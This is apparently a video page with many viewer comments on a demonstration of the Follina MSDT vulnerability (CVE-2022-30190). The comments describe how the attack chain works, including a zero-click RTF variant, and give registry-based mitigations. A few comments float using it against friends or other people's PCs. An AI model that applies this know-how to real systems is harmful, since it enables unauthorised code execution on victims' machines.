Want to become a HACKER? ITProTV has you covered: ntck.co/itprotv (30% off FOREVER) *affiliate link 🧪🧪Try it yourself!! (Links, docs, and walkthrough): ntck.co/follinalinks SPECIAL THANKS to John Hammond (go check him out!!) --------------------------------------------------- -CZcams: czcams.com/users/JohnHammond010 -Twitter: twitter.com/_JohnHammond -his amazing article on Follina: www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug 🔥🔥Join the NetworkChuck Academy!: ntck.co/NCAcademy **Sponsored by ITProTV 0:00 ⏩ Intro 1:58 ⏩ How does CVE-2022-30190 work?? 6:33 ⏩ What happens when you open the file? 9:23 ⏩ Let’s set up our zero-day vulnerability lab! 17:29 ⏩Time to test the Malware! 20:00 ⏩ Outro
@@axa897That’s true for this one. But there are 0click 0days out in the wild too. Take for example the pegasus spyware that got installed by just your phone receiving a message/gif and you not doing anything with it.
Thank you Network Chuck for making this video so quickly and of course thanks to John Hammond. I followed along and indeed was fun to play around with.
Hello there. I hope I am not intruding on your busy schedule. I was just wondering if you knew whether someone found a fix to this that doesn't involve the removal of the new text file option? I followed the official guide to fix it and I just reversed it back to before the fix because I can't bear having to open notepad to created a text file.
As a middle aged bearded geek going through A+ cert after years of computer nerdery, your videos always ring true to what I seem to be learning at any moment be it bash, be it ip sucking at subnetting or zero day exploits…Chuck you are tuned in to what so many delicious topics! Thanks for being our coffee! ☕️
I sure did. To date I have my A+, Net+, Sec+, Server+, Cloud+, LPI and am working on my CYSA+ and am lucky enough to be teaching entry level cybersecurity classes in workforce development.
Very interesting video. I've been playing with python for the last 5 or 6 months, but never knew you could make a webserver like that. Great content!!!
Definitely would like to see more of these type of videos. As a user of the 365 support and recovery tool for troubleshooting tenant issues I’m wondering how vulnerable the program is to being exploited, especially not knowing how superficial endpoint scanning is…
@NetWorkChuck Yes, you should keep doing vids like this. The good thing to this would be your growing along the way AND bringing others with you as they learn these things too!
You should really do a playlist explaining these vulnerabilities. Yes, there are channels explaining this stuff, but with you and your way of teaching things, explaining a CVE and how it works is a must for security professionals, especially if they want to be blue or red team pros, or even us, who are just passionate of these things. Do a playlist!!!!!!
Windows Defender seems to have caught up with Follina. Word still reaches out to the server, but that's it. You get a warning and nothing else is happening - at least with my setup, don't feel too safe. I really like the idea of Chuck and John making content as a team, by the way!
It depends on what you do with Folina. Hackers are experts in remaining undetected. What Chuck shows you is a very basic attack, but in real life instances victims wouldn't know that anything has been done, other than that they open a Microsoft product and the troubleshooting window runs.
@@MrSpyLiamof course. But as Defender seems to actually prevent the execution, it shouldn't really matter what payload is used. I might be wrong, though 🤷🏻♂️
Hey Chuck , ive actually come across the exact same thing yesterday except it wasnt a word document. It was a whole installation ISO of Windows 11 Pro , which my brother downloaded from the Pirate Bay. it triggered instantly once the installation was completed , and had some more effects to it whereby it damaged hardware so bad that the bios was messed up as well.
An ISO that you use at boot has basically full access to your system, not a good idea to download that from a pirate site without checking it in a VM first at least, msdt is the least of your issues when it comes to that lmao
Thanks for you work I love it. Tested it out and got it working. I wonder if the company I work for would have to worry about this. Sure they have it blocked already but you never know. Company is world wide
Man I just can hear you talking for hours 😂 I'm french but I just so easily understand what you say without paying attention. I admire your eloquence buddy 👏😎
Mr. Chuck, i've been following u since 2020 bro. Im so glad i followed u all this years, u make me clear of my path, my careers. All i just want to say is thank you. Keep on what ur doing, if my god wills it, i keep on supporting ur content bro, ( muslim from malaysia ) 😁😁
34 is not a “weird obfuscation” but just “ required so the Base64 receives payload string and decodes it and executes it, like a normal function call where the argument is a string, in this case, a base64 encoded payload
hey I here (am 14) quit Linux like 4-5 months ago as i wasn't able to understand anything. but then i came across you tutorials (Kali for beginners) and now you gain 1 sub, and like to each video. thanks for helping man you are awesome. keep it up
Jyst came across his channel, nobody warned me that the Vikings lineage was still going strong. What an evolution path, from raiding to coding. Love the facial hair here, just kidding around. You look like a character in Vikings late seasons, the brother of a King if I recall correctly but his name I can't say. Cheers
i like these type of videos, they tell u the dangerous tool but never tell u how to ACTUALLY get it to work so i will, for people who has no programming background and dont know how to make your version of this vulnerability, run this on a windows that has updates disabled and hope the windows on the target PC is an old version that cant detect this vulnerability, and for people who can program, here is a small tip: i honestly have no idea lol, if anyone actually can bypass the detection let me know lol
I'am too much happy to look at the face of people who talk about vulnerabilities in open source softwares. I'am very very very much happy to know about this zero day vulnerability.
12:18 Saying: "CMD", typing: "mcd"... 13:47 You call the file manager in Kali (I don't know exatly which is installed there...) "Explorer or whatever" and then call the *M$ Windows Explorer* "Finder" (which is the iMac's file manager)... Nice video!
SOE Engineer, Stuff like this makes my team busy, pushing our the reg hack fix to 4,000 devices to try and mitigate this along side reporting status updates to management fun times
Great video as always and love too see John here aswell! I Followed you along was going to download the follina.doc from python webserver on the windows box, but windows defender deleted it and detected virus. So that is atleast a good thing, looks like Im a bit late to the party !
Super interesting! I don't know if any solution has been found yet. If anyone is interested , there is properly some workarounds, but the one I know about is to disable 'MSDT URL Protocol'. Always amazing to see which ways hackers are getting into people's systems. Thanks for another great video Chuck!
@@Mainstayjay I just wrote an batch file for doing this, also included a way to back up the registery key that must be "deleted" so i can restore it when this has been patched.
This was great! I was watching and when you created the new network after you had already generated the word document I was like “that’s not going to work anymore” ha ha! Love yours and John’s content!
A zero day can last for years if not addressed properly. But this is what happens when there is no government control over companies like Microsoft. They do it a lot with health and safety, but when it comes to IT systems its like meh.
In essence, exploits of Follina involve a Word document containing a web link to an attacker-controlled web resource. Since Word automatically fetches such embedded links, the attacker may specially crafting their content such that it invokes a MSDT instance which may be used to force the execution of attacker-supplied Powershell commands. However, you failed to mention that Follina may be exploited in a zero-click fashion using a file in an .rtf format which runs the code via the Preview Tab in Explorer.
In well preped .rtf you don't even need user interaction. The preview of .rtf in windows explorer is enough. Maybe event outlook preview of .rtf file attachment - not sure rn.
By deleting the ms-msdt key, not by adding. Remove-Item REGISTRY::HKEY_CLASSES_ROOT\ms-msdt -Recurse -Force OR reg delete HKEY_CLASSES_ROOT\ms-msdt /f Make sure to backup first (reg export HKEY_CLASSES_ROOT\ms-msdt $env:USERPROFILE\Undo_FollinaFix_MS-MSDT.reg)
I used netcat before to emulate a postscript printer so that I could use an older printer with windows. Windows used it as a network attached postscript printer that linux used netcat to get the file and convert it to pdf then print using a driver available in linux.
I've got a fix for it, just remove the registry key "Computer\HKEY_CLASSES_ROOT\ms-msdt" completely and you're done, make a backup of the key before you remove the key. When the registry key is removed there's no way someone can remote control your computer using msdt.exe. I got this information from Dave Plummer, he's a retired Microsoft Operating Systems Engineer so he knows what he's talking about, here's a link to his video where he explains it all in detail: czcams.com/video/gmP8AtmVr0o/video.html
And then there's me, who just learnt for the first time how to install office using cmd !! 🙃 Jokes aside, Imma open all docs in virtual machines here on.
Opatch just released an unofficial patch that doesnt disable the MSDT URL protocol handler, and instead sanitizes the user-provided path. It’s free if you register an Opatch account.
Chuck, Honestly this is really spooky. I don't have a laptop so am using termux on my Android and in termux you'll have to use the --command or -c all at once and you'll have to specify your interface or use the default... Tried it at work and it worked.... Honestly its spooky
Want to become a HACKER? ITProTV has you covered: ntck.co/itprotv (30% off FOREVER) *affiliate link
🧪🧪Try it yourself!! (Links, docs, and walkthrough): ntck.co/follinalinks
SPECIAL THANKS to John Hammond (go check him out!!)
---------------------------------------------------
-CZcams: czcams.com/users/JohnHammond010
-Twitter: twitter.com/_JohnHammond
-his amazing article on Follina: www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
🔥🔥Join the NetworkChuck Academy!: ntck.co/NCAcademy
**Sponsored by ITProTV
0:00 ⏩ Intro
1:58 ⏩ How does CVE-2022-30190 work??
6:33 ⏩ What happens when you open the file?
9:23 ⏩ Let’s set up our zero-day vulnerability lab!
17:29 ⏩Time to test the Malware!
20:00 ⏩ Outro
Omg, your hair looks extremely good today. I like the side parting 🙀❤️
Ohh, and a Big thanks for your Videos. I Watched Them *all* ❤️🌹~
could it be that you got the t-shirt for father's day? xD if so, then that was a cool idea of theirs
we follow your work in Brazil 🇧🇷✨ .this encourages me !! thank you brother.
Love the way you talk 🥰
you typed mcd
Thanks for keeping the “mistakes” in the video. It reinforces the information sooo much better !
HUGE thanks for letting me come crash the party, NetworkChuck!! Looking forward to all the crazy cool stuff we can do in the future 😎
Ooohhhhh yeaaaaah
hi
I was so scared to 'click' this thread😰
fast video on this hot topic, gj
Hello there !!
It was amazing seeing Chuck test a real vunerability, this could be a very interesting series on your channel!
Zero-day vulnerability is scary and should be consider to learn with caution. Thank you for the information and keep it up!
Its not scary do not open any files from email and you 100% safe 🤷😂
Do not open .docx or .doc anymore that's it.
Use a trial vps instead to open if you really need to see what's inside document.
@Hòmè Ďeçoŕè hmmmmmmmmm
@@axa897That’s true for this one. But there are 0click 0days out in the wild too. Take for example the pegasus spyware that got installed by just your phone receiving a message/gif and you not doing anything with it.
Thank you Network Chuck for making this video so quickly and of course thanks to John Hammond. I followed along and indeed was fun to play around with.
As an ethical hacker in making, I really appreciated this video, very informative as always, thanks, Chuck!
Can you please hack my old inactive instagram account?
Hello there. I hope I am not intruding on your busy schedule. I was just wondering if you knew whether someone found a fix to this that doesn't involve the removal of the new text file option? I followed the official guide to fix it and I just reversed it back to before the fix because I can't bear having to open notepad to created a text file.
@@timeismore7239 Hahaha you think that easy?
As a middle aged bearded geek going through A+ cert after years of computer nerdery, your videos always ring true to what I seem to be learning at any moment be it bash, be it ip sucking at subnetting or zero day exploits…Chuck you are tuned in to what so many delicious topics! Thanks for being our coffee! ☕️
yoooooo, where did you reach now ? have you passed A+?
I sure did. To date I have my A+, Net+, Sec+, Server+, Cloud+, LPI and am working on my CYSA+ and am lucky enough to be teaching entry level cybersecurity classes in workforce development.
@@gregatit daaaaaaamnnn bro
Very interesting video. I've been playing with python for the last 5 or 6 months, but never knew you could make a webserver like that. Great content!!!
Definitely would like to see more of these type of videos. As a user of the 365 support and recovery tool for troubleshooting tenant issues I’m wondering how vulnerable the program is to being exploited, especially not knowing how superficial endpoint scanning is…
Thank you for this video, relateable content as im in the cyber security field. Would definatly be intersted in more content like this.
12:53 was expecting him to say to take another coffee break lolol
Chuck definitely do more stuff like that!!
Will do!
Microsoft be like: it’s not a bug, it’s a feature
Man, after months of "20mn video to explain if/else" it's really really nice to see again full power highly caffeinated Chuck
@NetWorkChuck
Yes, you should keep doing vids like this. The good thing to this would be your growing along the way AND bringing others with you as they learn these things too!
You should really do a playlist explaining these vulnerabilities.
Yes, there are channels explaining this stuff, but with you and your way of teaching things, explaining a CVE and how it works is a must for security professionals, especially if they want to be blue or red team pros, or even us, who are just passionate of these things.
Do a playlist!!!!!!
Super Video Chuck Your videos are awesome And informative
Windows Defender seems to have caught up with Follina. Word still reaches out to the server, but that's it. You get a warning and nothing else is happening - at least with my setup, don't feel too safe. I really like the idea of Chuck and John making content as a team, by the way!
It depends on what you do with Folina. Hackers are experts in remaining undetected. What Chuck shows you is a very basic attack, but in real life instances victims wouldn't know that anything has been done, other than that they open a Microsoft product and the troubleshooting window runs.
@@MrSpyLiamof course. But as Defender seems to actually prevent the execution, it shouldn't really matter what payload is used. I might be wrong, though 🤷🏻♂️
Amazing collab! Been following both of you for a while, awesome to see!
The intro kind of got me thinking - I can rickroll my friends with this and at the same time teach them about the Follina :D
Awesome!!! Tnx for the demo! Btw, gotta love that bash prompt, can you share the code so I can paste it in my .bashrc?
It's the standard kali linux prompt. Could be powerline10k
Hey Chuck , ive actually come across the exact same thing yesterday except it wasnt a word document. It was a whole installation ISO of Windows 11 Pro , which my brother downloaded from the Pirate Bay. it triggered instantly once the installation was completed , and had some more effects to it whereby it damaged hardware so bad that the bios was messed up as well.
You mean it ran this diagnostic tool window once installation was finished?
@@AnotherSkyTV yes once instalation was finished , pc rebooted , once signed in diagostic popped up
An ISO that you use at boot has basically full access to your system, not a good idea to download that from a pirate site without checking it in a VM first at least, msdt is the least of your issues when it comes to that lmao
Networkchuck & John Hammond content love to see that! Thank you chuck for the great content
Everytime I watch one of your videos about Linux I learn something new and want to learn more. Great video.
Amazing video Chuck. More content like this please dude
This entire day, I see this vulnerability everywhere lol 😂😂
Btw, this vulnerability works just on few versions of Office.
Which versions of Office are affected?
@@cobalt-snake6125 365, 2017 - 2019 I think
If it is in RTF format, you don't have to open it.
@@taahaseois.8898 Yup, that's right
@@cobalt-snake6125 the latest one is. don't know about the rest, also I'm pretty sure microsoft said they aren't going to fix it
its really awesome that this video references what you learn in the Hack the box course.
Thanks for you work
I love it. Tested it out and got it working.
I wonder if the company I work for would have to worry about this. Sure they have it blocked already but you never know. Company is world wide
Always loved the fascinating coding style of Zer0-Day since the mid 90's.
More of these videos please!
Imma send this to my friends and add something saucy to their browser history file lol
Man I just can hear you talking for hours 😂
I'm french but I just so easily understand what you say without paying attention. I admire your eloquence buddy 👏😎
Mr. Chuck, i've been following u since 2020 bro. Im so glad i followed u all this years, u make me clear of my path, my careers. All i just want to say is thank you. Keep on what ur doing, if my god wills it, i keep on supporting ur content bro, ( muslim from malaysia ) 😁😁
34 is not a “weird obfuscation” but just “ required so the Base64 receives payload string and decodes it and executes it, like a normal function call where the argument is a string, in this case, a base64 encoded payload
hey I here (am 14) quit Linux like 4-5 months ago as i wasn't able to understand anything. but then i came across you tutorials (Kali for beginners) and now you gain 1 sub, and like to each video. thanks for helping man you are awesome. keep it up
2 of my favorite youtubers looking at one of my favorite zero days
Love watching these thanks Chuck and John for sharing! Legends!
Hey Chuck! What is inside that coffee, man? Your voice speed in that video was like 3.5X already!
To be honest I am someone how doesn't have an interest in hacking but youtube keeps suggesting your videos which are really fun to watch 🙃
Jyst came across his channel, nobody warned me that the Vikings lineage was still going strong. What an evolution path, from raiding to coding.
Love the facial hair here, just kidding around. You look like a character in Vikings late seasons, the brother of a King if I recall correctly but his name I can't say.
Cheers
I'm in love with this videos. I'm 16 and videos like this inspire me in hacking hobby. ❤️🔥
i like these type of videos, they tell u the dangerous tool but never tell u how to ACTUALLY get it to work so i will, for people who has no programming background and dont know how to make your version of this vulnerability, run this on a windows that has updates disabled and hope the windows on the target PC is an old version that cant detect this vulnerability, and for people who can program, here is a small tip:
i honestly have no idea lol, if anyone actually can bypass the detection let me know lol
Thank you so much for this I have been waiting someone to do videos like this!
I think the most people became aware by microsoft's post on how to fix it by just like 2 command line things
Great stuff. Next time, ease up on the coffee a bit - it was making you hyper and jittery ... but very effective
Defo a cool video, great to see first hand in a really easy flowing way how to create a lab like this.
Missed opportunity to name yourself TechCheckChuck
I'm 12 and learn so much from this channel. Thanks!
I'am too much happy to look at the face of people who talk about vulnerabilities in open source softwares. I'am very very very much happy to know about this zero day vulnerability.
Also interesting stuff besides follina: python web server and adding a NAT network in VirtualBox on-the-fly. Got it running. Thx a lot!
Hacker's Delight: Hmm, we luv Macros-N-Cheese
no macros here
@@NetworkChuck just need something with the bland cheese🧀 😂🤣😅
Love John Hammonds content and yourself and would love to see more collabs
12:18 Saying: "CMD", typing: "mcd"...
13:47 You call the file manager in Kali (I don't know exatly which is installed there...) "Explorer or whatever" and then call the *M$ Windows Explorer* "Finder" (which is the iMac's file manager)...
Nice video!
How do you have the most basic of mugs during your coffee break sir? Lets up that game eh?
SOE Engineer, Stuff like this makes my team busy, pushing our the reg hack fix to 4,000 devices to try and mitigate this along side reporting status updates to management fun times
Great video as always and love too see John here aswell! I Followed you along was going to download the follina.doc from python webserver on the windows box, but windows defender deleted it and detected virus. So that is atleast a good thing, looks like Im a bit late to the party !
Yoo, a collab with John! Amazing video, congrats.
Super interesting!
I don't know if any solution has been found yet. If anyone is interested , there is properly some workarounds, but the one I know about is to disable 'MSDT URL Protocol'.
Always amazing to see which ways hackers are getting into people's systems.
Thanks for another great video Chuck!
this is what I did through cmd.
@@Mainstayjay I just wrote an batch file for doing this, also included a way to back up the registery key that must be "deleted" so i can restore it when this has been patched.
@@godsman271 you fancy man you. Very cool!
I often wonder if you record your Voice and Video at Normal speed and then speed it up before uploading? If not Kudos to you, pretty amazing.
Excellent !! Thanks for this detailed explanation and demo
Really great video. I loved how you showed troubleshooting and set up that Python web server to share that file. Great content as always.
this content is amazing!! keep it up this way :)
This was great! I was watching and when you created the new network after you had already generated the word document I was like “that’s not going to work anymore” ha ha!
Love yours and John’s content!
VERY interesting! Please do more videos like this!
Vulnerability vids are top notch
Zero-day? Microsoft knew about this bug for 1.5 months, they simply chose to do nothing about it.
A zero day can last for years if not addressed properly. But this is what happens when there is no government control over companies like Microsoft. They do it a lot with health and safety, but when it comes to IT systems its like meh.
In essence, exploits of Follina involve a Word document containing a web link to an attacker-controlled web resource. Since Word automatically fetches such embedded links, the attacker may specially crafting their content such that it invokes a MSDT instance which may be used to force the execution of attacker-supplied Powershell commands. However, you failed to mention that Follina may be exploited in a zero-click fashion using a file in an .rtf format which runs the code via the Preview Tab in Explorer.
awesome! thank you Chuck and John!
The way you talked walking through this reminded me of my brain 😂
amazing video! Great work!
Nice demo Chuck.
John I see you’re still doing your thing.
Subscribed!
MS troubleshooter disabled, checked. Thank you for the video.
I feel like this had probably been in the wild since years, this is so simple. Frightening.
Whoa chuck this is aswome you show us this!
In well preped .rtf you don't even need user interaction. The preview of .rtf in windows explorer is enough. Maybe event outlook preview of .rtf file attachment - not sure rn.
Thanks for your sharing
3:00 Ooohh that's powerful! Everything on a Windows machine uses the MSDT.
is that github script still working ? it showing error to me
@@ztech9604 I haven't tried to download it yet.
Superb..... I watch only like movie hacking video... Really don't know how
it's working..... Thanks .....
This was GREAT. PLS make more of this videos :)
definetely do more of this.
great video
Always make sure to follow instructions correctly, coffee breaks at the correct times are absolutely critical
You can actually get around it by adding specific keys to the registry of systems. Not a microsoft fix but it will protect you.
By deleting the ms-msdt key, not by adding.
Remove-Item REGISTRY::HKEY_CLASSES_ROOT\ms-msdt -Recurse -Force OR reg delete HKEY_CLASSES_ROOT\ms-msdt /f
Make sure to backup first (reg export HKEY_CLASSES_ROOT\ms-msdt $env:USERPROFILE\Undo_FollinaFix_MS-MSDT.reg)
Chuck, I think you’ve had enough coffee breaks. Love the videos!
Watching you re-size the Terminal Emulator gave me chills. :o Anonymity 101: Don’t resize your terminal windows, that’s another unique identifier.
Nice Video NetworkChuck, thanks for the information and i think that you can disable the msdt with a registry key so we can be more safe.
"What is this, a crossover episode?" - Mr. Peanutbutter
Yes more of its kind of videos will be great
I enjoyed every minute of it
Chuck you rock!
YES! More of this!
this is such a great video! thank you for your work!
Amazing! thank you for showing it
Wow nice video, especially liked the part with the python server, I didn't know you can do this it so cool
I used netcat before to emulate a postscript printer so that I could use an older printer with windows. Windows used it as a network attached postscript printer that linux used netcat to get the file and convert it to pdf then print using a driver available in linux.
Be doing more on CVEs that arise from the wild chuck. Understood it better now.
I just got me AWS and love the Channel and education
I've got a fix for it, just remove the registry key "Computer\HKEY_CLASSES_ROOT\ms-msdt" completely and you're done, make a backup of the key before you remove the key.
When the registry key is removed there's no way someone can remote control your computer using msdt.exe.
I got this information from Dave Plummer, he's a retired Microsoft Operating Systems Engineer so he knows what he's talking about, here's a link to his video where he explains it all in detail: czcams.com/video/gmP8AtmVr0o/video.html
And then there's me, who just learnt for the first time how to install office using cmd !! 🙃
Jokes aside, Imma open all docs in virtual machines here on.
Opatch just released an unofficial patch that doesnt disable the MSDT URL protocol handler, and instead sanitizes the user-provided path. It’s free if you register an Opatch account.
CZcamsr Dave Plummer posted a registry deletion to prevent the word doc hack. Do you agree? Thanks, enjoyed watching you work at light speed. Cheers
Chuck, Honestly this is really spooky. I don't have a laptop so am using termux on my Android and in termux you'll have to use the --command or -c all at once and you'll have to specify your interface or use the default... Tried it at work and it worked.... Honestly its spooky